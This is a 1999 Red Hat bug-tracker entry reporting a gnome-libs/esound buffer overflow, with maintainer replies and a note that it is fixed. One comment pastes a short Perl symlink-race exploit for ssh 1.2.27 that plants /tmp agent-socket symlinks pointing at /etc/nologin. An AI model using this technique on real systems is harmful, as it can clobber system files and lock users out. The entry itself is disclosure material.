Bug 5406 - Gnome espeaker local buffer overflow vulnerability
Gnome espeaker local buffer overflow vulnerability
Product: Red Hat Linux
Classification: Retired
Component: gnome-libs (Show other bugs)
All Linux
high Severity medium
: ---
: ---
Assigned To: Elliot Lee
: Security
Depends On:
  Show dependency treegraph
Reported: 1999-09-27 16:24 EDT by zurk
Modified: 2008-05-01 11:37 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 1999-10-27 16:52:14 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)

  None (edit)
Description zurk 1999-09-27 16:24:21 EDT
Gnome libs 1.08 is affected by a boundary condition error.
For further details see exploit URL:
I've also seen a local exploit for ssh 1.2.27 floating
around, but since that isnt included with redhat 6
officially..i dont know where to post it.
Comment 1 Bill Nottingham 1999-09-28 10:53:59 EDT
FWIW, there are no setuid/setgid root programs that ship with GNOME.

------- Additional Comments From   10/04/99 20:06 -------
hmm...here's the exploit for ssh :

 $pid = $$;

 $whoami = `whoami`;
 mkdir("/tmp/ssh-$whoami", 0700);

 for ($i = $pid; $i < $pid+50; $i++)
 symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");

and a relevant link :
Comment 2 Bill Nottingham 1999-10-07 14:03:59 EDT
Huh? What does ssh have to do with gnome-libs?

------- Additional Comments From   10/10/99 17:54 -------
sorry...just found the ssh thing that was floating around and didnt
know where to post it..anyway, can we now fix both bugs ? or should i
resubmit it somewhere else ?
Comment 3 Elliot Lee 1999-10-27 16:52:59 EDT
This bug is fixed in esound cvs, will be in next release.

Note You need to log in before you can comment on or make changes to this bug.